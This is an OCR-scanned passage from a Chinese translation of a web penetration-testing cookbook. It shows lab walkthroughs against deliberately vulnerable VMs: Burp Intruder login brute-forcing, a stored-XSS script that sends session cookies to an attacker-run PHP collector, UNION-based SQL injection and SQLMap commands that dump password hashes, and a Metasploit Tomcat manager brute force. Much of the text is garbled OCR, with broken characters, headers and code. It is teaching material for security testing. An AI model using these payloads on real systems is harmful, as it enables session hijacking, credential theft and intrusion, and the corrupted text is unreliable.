Connection: kesp-alive 

Content-Type: application/x-www-torm-urlencodaed 

Content-Length: 2B 


adminname-test&ápassword-test 


击 它 并 从 菜单 中 选择 send to intruder 。 


intruder 标签 页 会 高 亮 ， 让 我 们 访问 它 之 后 访问 Positions 标签 这 里 我 们 会 定义 请 求 
的 哪个 部 分 要 用 于 测试 。 


点 击 clear 8 来 清除 之 前 选项 的 区 域 。 


现在 ， 我 们 已 经 选择 了 什么 会 用 作 测 试 输入 。 高 亮 用 户 名 的 值 ( test ) ， 并 点 
击 Add 8 ° 


IF 38 AD 48 JAUET A8 FP] SR TE * JP RR Cluster bomb 作为 攻击 类 型 : 


125 


第 六 草 利用 -ERE 


L| 
~ LII 





Payloads | Options 


| 2j Payload Positions 


Ceonhbgure the pasitions where payloads will be inserted inta the base request. The attack type deterrrunes the way in which payloads are 
assigned to payload postions = sea help For full datails. 

















Attack typa: | Cluster bomb sj 


POST /wackoPicka/adein/index.php?page-lagin HTTP/1.1 

Host; 192.168.360.103 

User-Agent: Mozilla/5.0 [X11; Linux x86 &4; rv:18.0) Gecko/20100101 Firefox/18.0 
Accept: text/html,application/xhtmle-xml,application/xml;q20.9,*/*:0-20.8 
Arcept-Language: en-LD5,en;qeg.5 

Accept-Encoding: gzip, deflate 

Referer: http;//192.168,56.102/WackoPicko/admn/1index.php?pageslogin 

Cookie: PHPSESSIDeg1ipS5mm3dm7]n7prde65aSpeBdevl 


Connection: keep-alive 
Content-Type: applicatrion/x-www-form-urlencoded 
Content-Length: 28 


admi nnam: -ppe apas swa r d-K EIER 





[2] E) 9 Ei] [ree s suere term Suim MEI 


2 payload positions Length: 539 














10. 下 一 步 就 是 定义 Intruder 用 于 对 我 们 所 选择 的 输入 测试 的 值 。 访 问 Payloads 标签 页 。 


11. 使 用 写 着 Enter a new item 的 文本 框 和 Add 按钮 ， 使 用 下 列 东 西 来 卉 充 列 表 : 


user 

john 

admin 

alice 

bob 
administrator 


user 





可 Payload Sets 
You can define ane or more payload sets. The number of payload sets depends an the attack type defined in the Positions tab. Warous payload 
types are available for each payload set. and each payload type can ba customized in diferent ways. 


Payload set: [1 E Payload caunt: 7 


Payload type: Request count: 6,993 





EJ Payload Options [Simple list] 
This payload type lets you configure a simple list of strings that are used as payloads. 





| Paste | | user 

















| john | 
| Load .. | | admin | 
ATA | alice ^ 
| Remeve. | bob | 
i — —1 | administrator | 
| Clear | | 
| | super 
Add |Er ter a mew item 








12. 现在 从 Payload Set 框 中 选择 list 2 o 


13. AMAM SE ERE ASP|R o Ak Load 并 选择 字典 文件 。 
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14. 


15. 


16. 


17. 


3E 利用 -EIA E 


Look Jn: C ba tej La REB 




















GE bodgeit httrack $ fimap. txt 

(ig httrack Ñ users.txt 

| 9 cewl bodgeit.txt - webshell.php 

| 9 cewl perugia.txt | webshell.png 
| B cewl akapika tit 




















File Name: dict WackoPicko.txt 


Files of Type: | All Files - | M 
Open l Cancel | 


我 们 现在 拥有 了 两 个 载荷 集合 ， 并 准备 好 攻击 登录 页 面 了 。 在 顶部 的 菜单 中 ， 访 


l|] Intruder | Start attack ° 


如 果 我 们 使 用 免费 版 ， 会 出 现 一 个 提示 框 告 诉 我 们 一 些 功 能 是 禁用 的 。 这 里 ， 我 们 可 以 
不 使 用 这 些 功 能 ， 点 击 0k 。 


3p up uud a ° 为 了 分 辨 成 功 的 登录 ， 我 们 需要 检查 响应 长 度 。 点 
i: Length 列 来 排列 结果 ， 通 过 不 同 长 度 来 识别 响应 比较 容易 。 


Intruder attack 2 eeo 





























Attack Sawe Columns 


tesute | Target | Positions | Pa Options 





Filter: Showing all items | 7] 











(Request | Payload1 | Payloadz Status |Error | Timeout Length à| comment - 
























ü 200 LJ L] 811 basehne request 
|i user WarckoPicko 200 LJ Lj 811 
[2 john WarkoPicko 200 LJ L] el 
|3 admin WackoPicka 200 LJ LJ 811 
| 本 alice WackoPicka 200 Lj Lj 811 
E bob WackoPicka 200 LJ L] Bii 
|8 administrator WackoPicka 200 LJ LJ B11 
| 7 super WackoPicko 200 E Lj B11 
(a user Users 200 日 L] ell 
|a john Lisers 200 LJ L] 8 
| 10 admin Lisers 200 LJ LE] gll 


如 果 我 们 检查 不 同 长 度 的 结果 ， 我 们 可 以 看 到 他 重 定向 到 了 管理 主页 ， 就 像 下 面 这 样 
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| Results | Target Positions | Payloads | Options 








Fiter: Showing all items |? 
Request Payloadi Payloadz Status | Errar Timenut Length a| Comment 

0 | E ~ basali 

1 user WackoPicko 200 E 图 811 

2 inhm WarknBicln 2nf 811 = E 
au A EI m P p, 


| Request | Response | | 
| Raw | Headers | 


HITP/1.1 2353 See Other 

Date: Fri, ll Sep 2015 09:24:52 GMT 

Server: Apache/2.2.14 (Ubuntu) mod mano/2.4.3 PHP/5.3.2-lubuntuá4.5 with Suhosin-Patch proxy html/3.0.1 
mod python/23.3.1 Python/2.6.5 mod ssl/2.2.14 Opans5L/0.9.8k Phusion Passenger/3.0.17 mod perl/2.0.4 Perl/v5.10.1 
X-Powered-Ey: PHP/5.3.2-lubuntua.5 

Expires; Thu, 19 Nov 1981 08:52:00 GMT 

Cache-control: na-stare, no-cache, must-.revalidate, post-check-o0, pre-check-ü 

Pragma: no-cache 

Set-Cookis: sassion-lO 

Location: /wackoPicka/admin/index.php?page-home 

Vary: Accept-Encoding 

Content-Langth: 0 

Connection: close 

Content-Type; text/html 








工作 原理 


Intruder 所 做 的 是 ， 人 和 修改 请 求 的 特定 部 分 ， 并 使 用 定义 好 的 载荷 替换 这 些 部 分 的 值 。 载 荷 可 以 
是 这 些 东 西 : 


e 简单 列表 : 来 自 文 件 ， 由 剪贴 板 传递 或 者 写 在 文本 框 中 的 列表 。 


e 运行 时 文件 : Intruder 可 以 在 运行 时 从 文件 中 读 取 载 荷 ， 所 以 如 果 文 件 非常 大 ， 它 不 会 喘 
全 加 载 进 内 存 。 


e 


e 数字 : 生成 一 列 顺序 或 随机 的 数字 ， 以 十 进 制 或 十 六 进 制 形式 。 
e 用 户 名 生成 器 : 接受 邮件 地 址 列表 ， 从 中 提取 可 能 的 用 户 。 
e 爆破 器 : 接受 字符 集 并 使 用 它 来 生成 指定 长 度 的 所 有 排列 。 


这 些 载荷 由 Intruder 以 不 同形 式 发 送 ， 在 Positions 标签 页 中 由 攻击 类 型 指定 。 攻 击 类 型 在 载 
荷 标记 中 的 组 合 和 排列 方式 上 有 所 不 同 。 


e Sniper: 对 于 载荷 的 单一 集合 ， 它 将 每 个 载 褒 值 放 在 每 个 标记 位 置 ， 一 次 一 个 。 


e Battering ram : 类 似 Sniper， 它 使 用 载荷 的 单一 集合 ， 不 同 点 是 它 在 每 个 请 求 中 将 所 有 位 
及 置 为 相同 的 值 。 


e Pitchfork : 使 用 多 个 载荷 集合 ， 并 将 每 个 集合 中 的 一 个 项 目 放 到 每 个 标记 位 置 中 。 当 我 们 
拥有 不 能 混用 的 预定 义 数据 时 ， 这 会 非常 有 有 用， 例如， 测试 已 知 的 用 户 名 和 竹 码 。 


e Cluster bomb : 测试 多 个 载荷 ， 所 以 每 个 可 能 的 排列 都 可 以 测试 到 。 


对 于 结果 ， 我 们 可 以 看 到 所 有 失败 尝试 都 有 相同 的 响应 ， 这 里 是 811 字 节 。 所 以 我 们 假设 成 
功 响应 的 长 度 应 该 不 同 (因为 它 会 重 定向 到 用 户主 页 ) 。 如 果 碰 巧 成 功 和 失败 请 求 长 度 相 
同 ， 我 们 也 可 以 检查 状态 码 或 者 使 用 搜索 框 来 寻找 响应 中 的 特定 模式 。 


$2 
Kali 包含 了 非常 实用 的 冤 码 字典 和 单词 列表 集合 ， 位 于 /usr/ share/wordlists 。 一 些 文件 可 
以 在 这 里 找到 : 
e rockyou.txt : Rockyou.com 在 2010 年 被 攻破 ， 泄 露 了 多 于 14 亿 的 密码 ， 这 个 列表 包 
含 它们 。 
e dnsmap.txt : 包含 第 用 的 子 域名 称 ， 例 如 内 部 网 络 、FTP 或 者 WWW。 在 我 们 爆破 DNS 
服务 器 时 非常 实用 。 


e ./dirbuster/* : dirbuster 目录 包含 Web 服务 器 中 常见 的 文件 名 称 ， 这 些 文 件 可 以 在 
使 用 DirBuster 或 OWASP ZAP 强制 浏览 时 使 用 。 


e ./wfuzz/* : 在 这 个 目录 中 ， 我 们 可 以 找到 用 于 Web 攻击 的 模糊 字符 串 的 大 量 集合 ， 以 
及 爆破 文件 。 


6.6 通过 XSS 获得 会 话 Cookie 


我 们 已 经 谈论 过 了 XSS， 它 是 现在 最 第 见 的 Web 攻击 之 一 。XSS add be Ll ' 通过 
模仿 登录 页 面 来 获得 身份 ， 或 者 通过 执行 客户 端 命令 来 收集 信息 ， 或 者 通过 获得 会 话 cookie 
以 及 冒充 在 攻击 者 的 浏览 器 中 的 正常 用 户 来 动 持 会 话 。 


这 个 秘籍 中 ， 我 们 会 利用 持久 性 XSS 来 获得 用 户 的 会 话 Cookie， 之 后 使 用 这 个 cookie 来 通 
过 移植 到 另 一 个 浏览 器 来 劫持 会 话 ， 之 后 冒充 用 户 来 执行 操作 。 


准备 
对 于 这 个 秘籍 ， 我 们 需要 局 动 Web 服务 器 作为 我 们 的 cookie 收集 器 Kisten 


前 ， 我 们 需要 启动 Kali 中 的 Apache， 之 后 在 root 终端 中 执行 下 列 命 


service apache2 start 


在 这 本 书 所 使 用 的 系统 中 ，Apache 的 文档 根 目 录 位 于 /var/www/html ° €] 3E 
做 savecookie.php 的 文件 并 输入 下 列 代码 : 


<?php 

$fp = fopen('/tmp/cookie data.txt', 'a'); 
fwrite(S$fp, $ GET["cookie"] . "n"); 
fclose(S$fp); 

p 


这 个 PHP 脚本 会 收集 由 XSS 发 送 的 所 有 cookie。 为 了 确保 它 能 工作 ， 访 


l^] http://127.0.0.1/savecookie.php?cookie-test ^ 并 且 检 查 /tmp/cookie data.txt 的 内 容 : 


cat /tmp/cookie data.txt 


如 果 它 显 式 了 test 单词， 就 能 


效 。 下 一 步 就 是 了 解 Kali 主机 在 VirtualBox 主机 网 络 中 的 
地 址 ， 执 行 : 


ifconfig 


对 于 这 本 书 ，Kali 主机 的 vboxneto 44 2 IP 为 192.168.56.1 ° 
操作 步骤 


1， 我 们 在 这 个 秘籍 中 会 使 用 两 个 不 同 的 浏览 器 。OWASP Mantra 是 攻击 者 的 浏览 器 ， 
Iceweasel 是 受害 者 的 浏览 器 。 在 攻击 者 的 浏览 器 中 ， 访 


中 http://192.168.56.102/peruggia/ ° 


2. 让 我 们 给 页 面 的 图 斤 添 加 一 条 评论 ， 上 点击 comment on this picture ° 


Comments 


Comment on this picture 
3. 在 文本 框 中 输入 下 列 代码 : 


<SCr iDE> 
var xmlHttp = new XMLHttpRequest(); 
xmlHttp.open( "GET", 
ookie, true ); 


xmlHttp.send( null ); 
</script> 


"http://192.168.56.1/savecookie.php?cookie=" + document.c 


4. 点击 Post ? 


5. 页 面 会 执行 我 们 的 脚本 ， 即 使 我 们 看 不 见 任 何 改动 。 检 查 Cookie 文件 的 内 容 来 查看 结 
果 。 在 我 们 的 Kali 主机 上 ， 打 开 终 端 并 执行 : 


cat /tmp/cookie data.txt 





文件 中 会 出 现 新 的 条 目 。 


现在 ， 在 受害 者 浏览 器 中 访问 http://192.168.56.102/peruggia/ ° 


T. Ais Login ° 
8. 输入 admin TE] MP ZFR » JE S dS Login ° 


9. 让 我 们 再 次 检查 Cookie 文 件 的 内 容 : 


cat /tmp/cookie data.txt 





最 后 一 个 条 目 由 受害 者 的 浏览 器 中 的 用 户 生 成 。 


10. 现在 在 攻击 者 的 浏览 器 中 ， 确 保 你 没有 登录 ， 并 打开 Cookies Manager* (在 Mantra 的 


菜单 中 ^ Tools | Application Auditing | Cookies Manager+ ) E 
11. 选择 192.168.56.102 (vulnerable vm) 的 PHPSESSID Cookie » # A i Edit ° 


12. 从 /tmp/cookie data.txt 复制 最 后 一 个 Cookie。 之 后 将 其 粘贴 到 content. 字段 中 ， 像 这 
TE 


Cookies Manager+ v1.5.1.1 [showing 1.. 6 © o 





Edit Cookie- 


Mame: I PHPSESSID 
Content: BI  1r3fauiOv[tj7t4vce9Susb5afcr7| 
Host: Æ 192.168.56.102 
Path: & / 
Send For: BE | ^ny type of connectior - 
Http Only: ig No ~ 
Expires: Il 





save Close 


| Add | Edit | Delete | 





13. Ad: save ， 之 后 点 击 close 并 在 攻击 者 的 浏览 器 中 重新 加 载 页面 。 


| Penuggia 1.2 x 
y 三 Per 的 & | 
| € > m- [O 192.168.56.102/peruagia/ndex. phy U NEOS fi k 


£06 -Hee€ysx 











Welcome admin | Account | Uploadi/Delete | Logout | Home | About | Learn 


eo 


现在 我 们 通过 持久 性 XSS 攻击 劫持 了 管理 员 的 会 话 。 


工作 原理 


简单 来 说 ， 我 们 使 用 应 用 T 的 XSS 漏洞 来 将 会 话 Cookie 发 送 给 远程 服务 器 ， 
JavaScript HTTP 请 求 。 这 个 服务 器 被 配置 用 于 储存 会 话 Cookie， 之 后 ， 我 们 获得 一 个 会 话 
ID， 并 把 它 移 植 到 不 同 的 浏览 器 中 来 支持 验证 用 户 的 会 话 。 下 面 ， porah 
作 。 


我 们 编写 的 PHP 文件 用 于 在 XSS 攻击 执行 时 保存 收 到 的 COokie » 


我 们 输入 的 评论 是 一 个 脚本 ， 使 用 JavaScript 的 XMLHttpRequest 对 象 来 向 我 们 的 恶意 服务 器 
发 送 HTTP 请 求 ， 这 个 请 求 由 两 步 构建 : 


xmlHttp.open( "GET", "http://192.168.56.1/savecookie.php?cookiez" + document.cookie, t 
rue ); 


我 们 使 用 GET 方法 打开 请 求 ， 向 http://192.168.56.1/savecookie.php URL 77m "4 
is cookie 的 参数， 它 的 值 储存 在 document.cookie T * '& JavaScript 中 储存 cookie 值 的 变 
o 最 后 的 参数 设置 为 true ， 告 诉 浏览 器 这 是 异步 请 求 ， 这 意味 着 它 不 需要 等 待 响应 。 


xmlHttp.send( null ) 


最 后 的 指令 将 请 求 发 送 给 服务 器 。 


在 管理 员 登 录 并 查看 包含 我 们 所 发 送 评论 的 页 面 之 后 ， 脚 本 会 执行 ， 并 且 管 理 员 的 会 话 
cookie 就 储存 在 我 们 的 服务 器 中 了 。 


最 后 ， 一 旦 我 们 获得 了 有 效用 户 的 会 话 cookie， 我 们 可 以 在 浏览 器 中 替换 我 们 自己 的 会 话 
Cookie， 之 后 重新 加 载 页 面 来 执行 操作 ， 就 像 我 们 是 这 个 用 户 一 样 。 


P 


不 仅仅 是 保存 会 话 Cookie 到 文件 ， 恶 意 服务 器 也 可 以 使 用 这 些 cookie 来 向 应 用 发 送 请 求 来 冒 
正常 用 户 ， 以 便 执 行 操 作 ， 例 如 添加 或 删除 评论 、 上 传 图 片 或 创建 新 用 户 ， 甚 至 是 管理 


步 执 行 基本 的 SQL 注入 


我 们 在 第 四 章 了 解 了 如 何 检 测 SQL 注入 。 这 个 秘籍 中 ， 我 们 会 利用 这 个 注入 ， 并 提取 数据 库 
的 信息 。 


TETTE JH 


1. 我 们 已 经 知道 了 DVWA 存在 SQL 注入 的 漏洞 。 所 以 我 们 使 用 OWASP Mantra ZR? 2 


后 访问 http://192.168.56.102/dvwa/vulnerabilities/ sqli/ ? 


2， 在 检测 SQL 注入 存在 之 后 ， 下 一 步 就 是 查询 ， 准 确 来 说 就 是 结果 有 多 少 列 。 在 ID 框 中 
输入 任何 数字 之 后 点 击 submit ° 


3， 现 在， 打开 HackBar ( 按 下 F9) 并 点 击 Load URL 。 地 址 栏 中 的 URL 应 该 出 现在 
HackBar 内 。 


4. 在 HackBar 中 ， 我 们 将 ia 参数 的 值 替换 为 1' order by 1 -- ' ， 并 点 击 Execute ° 


5. 我 们 通过 执行 请 求 ， 持 续 增 加 order. 数字 后 面 的 值 ， 直 到 发 生 错 误 。 这 里 例子 中 ， 它 
在 3 的 时 候 发 生 。 


INT + a € SQL: X55- Encryption: Encoding: Other- 
guLoad URL | http://182.188. 55. 102/dvwa/vulnerabilities/sqli/ 
"n1dsl' order by 3 -- ' 
HM Split UAL | &SubmiteSubnmite 
+) Execute 


Enable Post data Enable Referrer 
€- — S~ || 192.168.56.102/dvwa/vulnerabiities/sqii/?7id=1" order by 3 — &Submit Submit 


"Yr | Lnknawn column '3' in 'order clause’ 


6. 现在， 我 们 知道 了 请 求 由 两 列 。 让 我 们 尝试 是 否 能 使 用 UNION 语句 来 提取 一 些 信 息 。 现 


在 将 id 的 值 设 为 1' union select 1,2 -- ' JE 3 k Excecute ? 


Vulnerability: SQL Injection 


| Submit | 


ID: 1' union select 1,2 -- ' 
First name: admin 
Surname: admin 


ID: 1' union select 1,2 -- 
First name: 1 
Surname: Z 





这 意味 着 我 们 可 以 在 UNION 查询 中 请 求 两 个 值 。 那 么 试 试 DBMS 的 版 本 和 数据 库 用 户 


如 何 呢 ?将 id 设 为 1' union select QGversion,current user() -- ' 并 点 击 Execute ° 


Vulnerability: SQL Injection 


|| Submit | 


ID: 1' union select (aàversion,current useri(] -- ' 
First name: admin 
Surname: admin 


ID: 1' union select (Miversion,current user() -- ' 
First name: 5.1.41- 3ubuntu12.6-log 
Surname: dvwaüfs 





让 我 们 查找 一 些 有 关 的 东西 ， 例 如 应 用 的 用 户 。 首 先 ， 我 们 需要 定位 用 户 表 ， 将 ia 设置 


为 1' union select table schema, table name FROM information schema.tables WHERE table 


Oo 


Vulnerability: SQL Injection 
User ID: 


ID: 1' union select table schema,table name FROM infarmation schema.tables where table name like '*user^' 
First name: admin 

Surname: admin 

ID: 1' union select table schema,table name FROM information schema.tables where table name like '*user*' 
First name: information schema 

Surname: USER PRIVILEGES 

ID: 1' union select table schema,table name FROM information schema.tables where table name like '*:user*' 
First name: dvwa | 

Surname: users 


好 的 ， 我 们 知道 了 数据 库 ( £X Schema) 叫做 dvwa ， 我 们 要 查找 的 表 叫 做 users ° AA 
我 们 只 有 两 个 地 方 来 设置 值 ， 我 们 需要 知道 的 哪 一 列 对 我 们 有 用 。 将 id 设置 
为 1' union select column name, 1 FROM information schema.tables WHERE table name = 'us 


Oo 


10. xS 
为 


利用 -- EIA E 


ID: 1' union select column name,l FROM information schema.columns 
First name: user id 
Surname; 1 


information schema. 


ID: 1' union select column name,1 
First name: first name 

Surname: 1 

ID: 1' union select calumn name,1 4 1nformation schema. 
First name: last name 

Surname: 1 

ID: 1' union select column name,1 information schema. 
First name: user 

Surname: 1 


ID: 1l' union select column name,1 
First name: password 
Surname: 1 


information schema. 


ID: 1' union select column name,]1 information schema 
First name: avatar 


Surname: 1 





' 我 们 确切 知道 了 要 请 求 什 么 


1' union select user, 


' 将 id X 


password FROM dvwa.users -- ' 


Vulnerability: SQL Injection 


在 


个 用 户 的 密码 哈 希 。 我 们 可 以 将 这 


User ID: 


| || Submit | 


ID: 1' union select user,password FROM dvwa.users 
First name: admin 
Surname: admin 


columns 


columns : 


columns 


columns v 


.columns : 


where table name like 
e like 
like 
| like 


like 


like 


ID: 1' union select user,password FROM dvwa.users -- 


First name: admin 
Surname: 212321297a57a5a743894a0e4aB011c3 


ID: 1' union select user,password FROM dvwa.users 
First name: gordonb 
Surname: eSg93al8c428cb38d5f 260853678922e03 


ID: 
First name: 1337 
Surname: 8d3533d75ae2c3966d7eO0d4f cc&69216b 


1' union select user,password FROM dvwa.users 


ID: 1' union select user,password FROM dvwa.users -- 


First name: pablo 
Surname: Od107d09fSbbe40cade3de5c71e9e9b7 


ID: 1' union select user,password FROM dvwa.users 
First name: smithy 
Surname: Sf4dcc3b5aa765d61d8327deb882cf 99 


ID: 


First name: user 
Surname: eellcbblS052e40bO07aacOcaO060c23ee 


First name 字段 中 ， 我 们 得 


the Ripper 或 我 们 喜欢 的 密码 破解 器 来 破解 。 


IE ARS 


1' union select user,password FROM dvwa.users 


到 了 应 用 的 用 户 名 ， 在 surname 字段 汇总 ， 我 们 得 
些 哈 希 复制 到 我 呢 本 文 呢 减 重 ， 并 且 堂 


"huser*' 


' Su jserss* 


sery" 


"SuSer s 


'"huser'*s* 


"Nuserts* 





寻 到 了 每 
试 使 用 John 


135 


在 我 们 的 第 一 次 注入 ，1' order by 1 -- ' $| 1' order by 3 -- 中， 我 们 使 用 SQL 语言 的 
特性 ， 它 允许 我 们 通过 特定 的 字段 或 类 ， 使 用 它 的 编号 来 排列 结果 。 我 们 用 它 来 产生 错误 ， 
于 是 能 够 知道 查询 一 共有 多 少 列 ， 便 于 我 们 将 其 用 于 创建 UNION 查询 。 


UNION 查询 语 甸 用 于 连接 两 个 拥有 相同 列 数量 的 查询 ， 通 过 注入 这 些 我 们 就 可 以 查询 数据 库 
中 几乎 所 有 东西 。 这 个 秘籍 中 ， 我 们 首先 检查 了 它 是 否 像 预期 一 样 工 作 ， 之 后 我 们 将 目标 设 
置 为 users 表 ， 并 设法 获得 它 。 


第 一 步 是 弄 清 数 据 库 和 表 的 名 称 ， 我 们 通过 查询 information schema 数据 库 来 实现 ， 它 是 
MySQL 中 储存 所 有 数据 库 、 表 和 和 列 信 息 的 数据 库 。 


一 旦 我 们 知道 了 数据 库 和 表 的 名 称 ， 我 们 在 这 个 表 中 查询 所 有 列 ， 来 了 解 我 们 需要 查找 哪 一 


列 ， 它 的 结果 是 user 和 password ° 


最 后 ， 我 们 注入 查询 来 请 求 dvwa 数据 库 的 users X P IA M P Fog Aa o 


6.8 使 用 SQLMap 发 现 和 利用 SQL 注入 


我 们 已 经 在 上 一 个 秘籍 中 看 到 ， 利 用 SQL 注入 是 个 繁琐 的 步骤 。SQLMap 是 个 命令 行 工 具 ， 
包含 在 Kali 中 ， 可 以 帮 有 我们 自动 化 检测 和 利用 SQL 注入 。 它 带 有 多 种 技巧 ， 并 支持 多 种 数据 
o 


这 个 秘籍 中 ， 我 们 会 使 用 SQLMap 来 检测 和 利用 SQL 注入 漏洞 ， 并 用 它 获得 应 用 的 用 户 名 
和 密码 。 


操作 步骤 
1， 仿 问 http://192.168.56.102/mutillidae ° 


2. 在 Mutillidae 的 菜单 中 ， 访 


站 OWASP Top 10 | A1 - SQL Injection | SQLi Extract Data | User Info ° 
3. & AETA P eR o lka user 和 password 之 后 点 击 view Account Details ° 
4. 登录 会 失败 ， 但 是 我 们 对 URL 更 感 兴 趣 。 访 问 地 址 栏 并 将 完整 的 URL 复制 到 剪贴 板 。 


5.， 现 在， 打开 终端 窗口 ， 输 入 下 列 命令 


sqlmap -u "http://192.168.56.102/mutillidae/index.php?page=userinfo.php&username=u 
ser&password=password&user-info-php-submitbutton=View+Account+Details" -p username 
--current-user --currentdb 


你 可 以 注意 到 ， -u 参数 就 是 所 复制 的 URL 的 值 。 -p 告诉 SQLMap 我 们 打算 在 用 户 名 
参数 中 查找 注入 。 一 旦 漏洞 被 利用 ， 我 们 想 让 它 获 得 当前 数据 库 用 户 名 和 数据 库 的 名 
称 。 我 们 只 打算 获得 这 两 个 值 ， 因 为 我 们 只 想 判 断 这 个 URL. 的 username. 参数 是 否 存 在 


SQL 注入 。 


HIA aj | HEGI IET m E IFLEE ii AXiD I 1 i P m | parapi ID a "uUa f iani imrigntr 5s | 11E Al D GETER p 
1: 18: 50] | [2 i] lii iS Tu: ims tast zmes "IT iF 1 F] ITE STI uzere might he TESE ihl Tu Eu Aitta ks 


it Loeks like the "i keend Das is MIL NEM UNI IM skip uL payleaids apercifis fər ether ILE LIEB REL 
for the remaining tests, do yom want ta eerk all tests for 'Ays0L" extending provided level [1} and risk II} values? AI 





— €. SQLMap E HEB 的 DBMS， 它 会 询问 我 们 是 否 跳 过 检测 其 它 DBMS 的 
步 又， 以 及 是 否 包含 所 有 特定 系统 的 测试 。 即 使 它们 在 当前 的 配置 等 级 和 风险 之 
A npn le 其 它 系 统 ， 以 及 No 来 包含 所 有 测试 。 


一 旦 我 们 指定 的 参数 中 发 现 了 汤 洞 ，SQLMap 会 询问 我 们 是 否 打 算 测 试 其 它 和 参数， 我 们 
回答 No ， 之 后 观 伦 结果: 


i] [INFO] GET parameter 'username Ji Til 4L qwory [ARIM i | t E celms’ imjectabli 
GEI npp ELIT [IEEE pul ieraho Ds LE want io keep testing the others lif anyi? Ẹ " 





如 果 我 们 打开 获得 用 户 名 和 密码， 类 似 于 我 们 在 上 一 个 秘籍 那样 ， 我 们 需要 知道 含有 这 
些 信息 的 表 名 称 。 在 终端 中 执行 下 列 代码 : 


sqlmap -u "http://192.168.56.102/mutillidae/index.php?page=userinfo.php&username=t 
est&password=test&user-info-php-submitbutton=View+Account+Details" -p username -D 
nowasp --tables 


[20:22:54] [INFO] the back-end DBHS is MySQL 





SQLMap 会 保存 所 执行 的 注入 日 志 ， 所 以 第 二 次 攻击 会 花费 更 少 的 时 间 。 你 可 以 看 到 ， 
我 们 指定 了 要 提取 信息 (nowasp) 的 数据 库 ， 并 告诉 SQLMap 我 们 想 获取 这 个 数据 库 
的 表 名 称 列 表 。 


9. accounts 表 使 含有 我 们 想 要 的 信息 的 表 之 一 。 让 我 们 转 储 内 容 : 


sqlmap -u "http://192.168.56.102/mutillidae/index.php?page-userinfo.php&username-t 
est&password-test&user-info-php-submitbutton-View-Account-*Details" -p username -D 
nowasp -T accounts --dump 





1346 878 706 3E 85 E] PLUR o 3E BLAME] T VUE S] o 3x € 35 85 3E EUR Z0 98 > MARTA 
直接 使 用 它们 。 


工作 原理 


SQLMap 会 使 用 SQL 注入 字符 串 ， 对 给 定 URL 和 数据 的 输入 进行 模糊 测试 ， 或 者 只 针 

对 -p 选项 中 的 特定 目标 ， 并 且 解 释 其 响应 来 发 现 是 否 存在 漏洞 。 不 要 模糊 测试 所 有 输入 ， 服 
好 使 用 SQLMap 来 利用 我 们 已 知 存 在 的 注入 ， 并 始终 尝试 缩小 搜索 过 程 ， 通 过 提供 所 有 可 用 
的 信息 ， 例 如 漏洞 参数 、DBMS 类 型 ， 以 及 其 它 。 在 所 有 可 能 性 下 了 寻找 注入 会 花费 大 量 时 

间 ， 并 在 网 络 中 产生 非常 大 的 流量 。 


这 个 秘籍 中 ， 我 们 已 经 知道 了 用 户 名 参数 存在 注入 漏洞 (因为 我 们 使 用 了 Mutillidae 的 注入 测 
试 页 面 ) 。 在 第 一 个 攻击 中 ， 我 们 只 希望 确认 注入 是 否 存在 ， 并 询问 一 些 非常 基本 的 信息 : 
用 户 名 ( --curent-user ) fe X LAE JE Z AR ( - current -db ) : 


在 第 二 个 攻击 中 ， 我 们 使 用 -p 选项 ， 以 及 前 一 次 攻击 所 获得 的 名 称 ， 指 定 布 望 查询 的 数据 
库 ， 我 们 也 使 用 --tables 询问 了 所 包含 的 表 名 称 。 


知道 我 们 希望 获得 哪个 表 ( -T accounts ) ZÆ ° RÆ SQLMap 使 用 --dump 转 储 它 的 内 


` 
UKA 


容 。 


P 


SQLMap 也 能 够 注入 POST 参数 中 的 输入 变量 。 我 们 只 需要 添加 --data 选项 并 附带 POST 
数据 ， 例 如 : 


--data "username-test&password-test" 


有 时 候 ， 我 们 需要 在 一 些 应 用 中 获得 身份 验证 ， 以 便 能 够 访问 应 用 的 漏洞 URL。 如 果 是 这 
样 ， 我 们 可 以 传递 有 效 的 会 话 Cookie 给 SQLMap， 使 用 --cookie 选项 : 


--cookie "PHPSESSID-ckleiuvrv60fs012hlj72eeh37" 


这 在 测试 Cookie 值 的 注入 时 也 非常 有 用 。 


另 一 个 有 趣 的 特性 是 ， 使 用 --sql-shell 选项 ， 它 可 以 为 我 们 提供 SQL shell， 其 中 我 们 可 以 
执行 SQL 查询 ， 就 像 我 们 直接 连接 到 — 。 或 更 有 趣 的 是 ， 我 们 可 以 使 
用 --osshell 在 数据 库 服务 贤 中 执行 系统 命令 〈 在 注入 MSSQL 服务 器 时 特别 有 用 ) 。 


为 了 了 解 SQLMap 拥有 的 所 有 选项 和 特性 ， 你 可 以 执行 


sqlmap --help 


j JL 
Kali 包含 了 用 于 检测 和 利用 SQL 注入 漏洞 的 其 它 工具 ， 它 们 能 够 用 于 代替 或 配合 SQLMap : 


e sqlninja : 非常 流行 的 工具 ， 为 利用 MSSQL 服务 器 而 设计 。 


e Bbqsql : Python 编写 的 SQL 讶 注 框 架 。 
e jsql : 基于 Java 的 工具 ， 带 有 完全 自动 化 的 GUI， 我们 只 需要 输入 URL 并 按 下 按钮 。 
e Metasploit : 它 包含 不 同 DBMS 的 多 种 SQL 注入 模块 。 


6.9 使 用 Metasploit 攻击 Tomcat 52 % #5 
Apache Tomcat， 是 世界 上 最 广泛 使 用 的 Java Web 服务 器 之 一 。 带 有 默认 配置 的 Tomcat 服 


务 器 非常 容易 发 现 。 发 现 暴 露 Web 应 用 管理 器 的 服务 器 也 非常 容易 ， 它 是 一 个 应 用 ， 人 允许 管 
理 员 启动 、 停 止 、 添 加 和 删除 服务 器 中 的 应 用 。 


` 
N 


这 个 秘籍 中 ， 我 们 会 使 用 Metasploit 模块 来 执行 Tomcat 服务 器 上 的 字典 攻击 来 获得 管理 器 应 
用 的 访问 。 


准备 
在 我 们 开始 使 用 Metasploit 之 前 ， 我 们 需要 在 root 终端 中 开局 数据 库 服务 : 


service postgresql start 


TRE 2p He 
1. Æ Z Metasploit 的 控制 台 。 
msfconsole 
2. 启动 之 后 ， 我 们 需要 加 载 合适 的 模块 ， 在 msf> 提示 符 之 后 键入 下 列 代码 : 
use auxiliary/scanner/http/tomcat mgr login 
3 我们 可 能 打算 查看 它 使 用 什么 参数 : 


show options 





4 现在， 我 们 设置 目标 主机 : 


set rhosts 192.168.56.102 


5. 为 了 使 它 更 快 ， 但 是 不 要 太 快 ， 我 们 增加 线程 数 : 


set threads 5 


6， 同 时 ， 我 们 不 希望 让 我 们 的 服务 器 由 于 太 多 请 求 而 崩溃 ， 所 以 我 们 降低 爆破 的 速度 : 


set bruteforce speed 3 


